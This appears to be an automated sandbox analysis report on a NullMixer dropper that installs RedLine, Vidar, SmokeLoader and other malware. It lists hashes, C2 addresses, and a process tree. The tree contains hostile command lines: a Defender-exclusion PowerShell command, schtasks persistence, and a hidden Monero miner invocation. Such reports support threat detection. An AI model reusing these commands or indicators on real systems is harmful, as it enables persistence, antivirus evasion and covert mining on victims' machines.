Analysis
-
max time kernel
0s -
max time network
106s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
31-12-2023 03:59
Static task
static1
Behavioral task
behavioral1
Sample
2737e2cab1e399c563fe0557683234fd.exe
Resource
win7-20231215-en
General
-
Target
2737e2cab1e399c563fe0557683234fd.exe
-
Size
3.9MB
-
MD5
2737e2cab1e399c563fe0557683234fd
-
SHA1
a78fdf21a20d386622a448909c4c3d8a527e3102
-
SHA256
f7f5898bbed2b677a52a031071110b8aebb4b3eba2669703f6dd60e6953dc2a2
-
SHA512
3e58d11e6a87bb5f52e674b998672e9d3d8b165275e8818733a2da1043279a9c4109aa7ad51bb74de9984d360e7f277f92653f50e2088c66cb0b6552901a6dff
-
SSDEEP
98304:yFdkFKkhdtRHWG5yuIEjf9kDQQXItcd0u3uOZKGo:yFRkHLJhBFoXItcd008
Malware Config
Extracted
nullmixer
http://marisana.xyz/
Extracted
vidar
40
706
https://lenak513.tumblr.com/
-
profile_id
706
Extracted
smokeloader
pub6
Extracted
redline
Build1
45.142.213.135:30058
Signatures
-
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/4120-211-0x0000000000400000-0x000000000041E000-memory.dmp family_redline -
SectopRAT payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/4120-211-0x0000000000400000-0x000000000041E000-memory.dmp family_sectoprat -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Vidar Stealer 2 IoCs
Processes:
resource yara_rule behavioral2/memory/1032-158-0x0000000000400000-0x000000000334B000-memory.dmp family_vidar behavioral2/memory/1032-135-0x0000000003420000-0x00000000034BD000-memory.dmp family_vidar -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\libstdc++-6.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\libcurl.dll aspack_v212_v242 -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 15 ipinfo.io 16 ipinfo.io -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 1224 2544 WerFault.exe setup_install.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 4384 schtasks.exe 4868 schtasks.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2737e2cab1e399c563fe0557683234fd.exe"C:\Users\Admin\AppData\Local\Temp\2737e2cab1e399c563fe0557683234fd.exe"1⤵PID:448
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵PID:1296
-
C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\setup_install.exe"3⤵PID:2544
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 45523e3cdecd50c9.exe4⤵PID:1888
-
C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\45523e3cdecd50c9.exe45523e3cdecd50c9.exe5⤵PID:2220
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cc8d5bf9d8.exe4⤵PID:1404
-
C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\cc8d5bf9d8.execc8d5bf9d8.exe5⤵PID:4368
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 52748077bb26.exe4⤵PID:4384
-
C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\52748077bb26.exe52748077bb26.exe5⤵PID:2784
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2544 -s 5564⤵
- Program crash
PID:1224 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dc8baab07.exe4⤵PID:1528
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 23cfc2c69e2b5.exe4⤵PID:4092
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c f35fb6370e5673.exe4⤵PID:1700
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 227af833e4e9ad4.exe4⤵PID:3364
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 0c879100232.exe4⤵PID:1960
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cfbebc6111c611.exe4⤵PID:3672
-
C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\0c879100232.exe0c879100232.exe1⤵PID:4408
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2544 -ip 25441⤵PID:848
-
C:\Windows\winnetdriv.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1704167719 01⤵PID:4940
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"1⤵PID:3716
-
C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\23cfc2c69e2b5.exe"C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\23cfc2c69e2b5.exe" -a1⤵PID:3476
-
C:\Users\Admin\AppData\Local\Temp\chrome2.exe"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"1⤵PID:3856
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit2⤵PID:4232
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"2⤵PID:3956
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"3⤵PID:2820
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit3⤵PID:5108
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.main/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6BJ+edII5Fll530cZ/+msGEWovb73nU3RrOnuNmRoFcg" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth3⤵PID:3752
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe1⤵PID:4896
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"2⤵PID:4120
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"2⤵PID:1060
-
C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\23cfc2c69e2b5.exe23cfc2c69e2b5.exe1⤵PID:4260
-
C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\cfbebc6111c611.execfbebc6111c611.exe1⤵PID:4596
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXEC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE2⤵PID:5044
-
C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\f35fb6370e5673.exef35fb6370e5673.exe1⤵PID:3144
-
C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\227af833e4e9ad4.exe227af833e4e9ad4.exe1⤵PID:1032
-
C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\dc8baab07.exedc8baab07.exe1⤵PID:396
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'1⤵
- Creates scheduled task(s)
PID:4384
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7zS1807.tmp\Install.cmd" "1⤵PID:2992
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/16B4c72⤵PID:4336
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb469e46f8,0x7ffb469e4708,0x7ffb469e47183⤵PID:4880
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2120,14268065565239611010,16345434479952773,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2836 /prefetch:83⤵PID:4864
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,14268065565239611010,16345434479952773,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:33⤵PID:4312
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,14268065565239611010,16345434479952773,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:23⤵PID:4640
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14268065565239611010,16345434479952773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:13⤵PID:536
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14268065565239611010,16345434479952773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:13⤵PID:4500
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,14268065565239611010,16345434479952773,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5456 /prefetch:83⤵PID:1572
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,14268065565239611010,16345434479952773,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5456 /prefetch:83⤵PID:4748
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14268065565239611010,16345434479952773,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5180 /prefetch:13⤵PID:2924
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14268065565239611010,16345434479952773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5144 /prefetch:13⤵PID:3092
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14268065565239611010,16345434479952773,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:13⤵PID:2440
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14268065565239611010,16345434479952773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3416 /prefetch:13⤵PID:2948
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3284
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1736
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'1⤵
- Creates scheduled task(s)
PID:4868
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
218KB
MD5d09be1f47fd6b827c81a4812b4f7296f
SHA1028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA2560de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595
-
Filesize
54KB
MD5e6e578373c2e416289a8da55f1dc5e8e
SHA1b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA25643e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA5129df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89
-
Filesize
113KB
MD59aec524b616618b0d3d00b27b6f51da1
SHA164264300801a353db324d11738ffed876550e1d3
SHA25659a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA5120648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
69KB
MD51e0d62c34ff2e649ebc5c372065732ee
SHA1fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA5123653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61
-
Filesize
3.6MB
MD5a58f43f901088dfa7576e1976c85eccb
SHA13883572f5370f0e96f089ce94813d7d852c224de
SHA256019f2db0c2bfce02d7710e4d540b755d580d7b65a51b85761cef08f75d0f674f
SHA512203702cc19d43b4ebcb0be7b78e7690b10be6f168528cfde7d2f63fca51233eded1093e4f968ac0ef2b9814343314f0caf4737e328c4ee07c5a17d57a18a5357
-
Filesize
92KB
MD522aedcbfd9a9fa6ecdc6ab3023758197
SHA13c9355a168b79559e5e72408ff3648f7908b87b5
SHA256d9588ce55ad638cb03668b358d4040385e70512ca487279c3852450e421b0107
SHA51242e4d05565fc366d486a619657f8549beb9d9b4c799451657654dcdb955f304c061d7a3fef8e3ebedaa6e1b6dffa0c93d1fac7040c0ad415dfd2abacbef29ee6
-
Filesize
3.2MB
MD50c1daf8441a91d34da49707c8aee0902
SHA1cb5e5ccfaf253ab657f23b2c18f9061997f380d9
SHA256df9d05706f4169d2ba56250751d9a5233bb3aa7909cdc15a5ea4ae528e74dc29
SHA512f68ccdef48a7af745297d9150cffa9937a2282c66ff6d37023dd8cd2225f740bf051b11e7af156f15219b9dc11f7df6babd8f1a9de619724212d74cbf11acd84
-
Filesize
894KB
MD5994d04287d79729d0d51755455ccac6c
SHA1155bdf22c7e3dbc44095c3183a097898a788dfbc
SHA256a787d7498fe858f2e24f7084720cee0fefb0630244962eae897f5bc0877e054c
SHA512a50211ae1cfede7c55e7117555efa1753cd6c75400a743e86352b1f757a7ac65285523a7ba8611a3ffc4338c27ee10fe89f8bb3746bd14968152d1d9d6fa2563
-
Filesize
386KB
MD5093083fdf334a5df443ff99547828ae3
SHA1850820ccb5dac80a488fda6314d2c9608665d28f
SHA256c5ad98b39662604374e6bb3062d3074fbb3aeb019ae618e3432a4a20bd15df96
SHA5121ef373ca706f2126cf92a6161453092450438dc505d4e2070f6f1709b39b3d93f12ec375219d781a8ce006fbfa10542581f642c63d8753675734256f7f38527d
-
Filesize
384KB
MD53cbb17dd1b89c5e7b56450e0d8b2c448
SHA18f0319862c3dcd567fb9f8ff725d8fc4bab87dd3
SHA2567ff88838f8958378526b4150d40cb4de26470e3fa1990c838a689a5172b00681
SHA51262998f303ae386c28bfbecb4558c6b46400327369551b69f59dacb7b32b491889ffec840d100b0dc4d75bffe4f07bad3dd72b5436c404b07ebfcff70f7424faf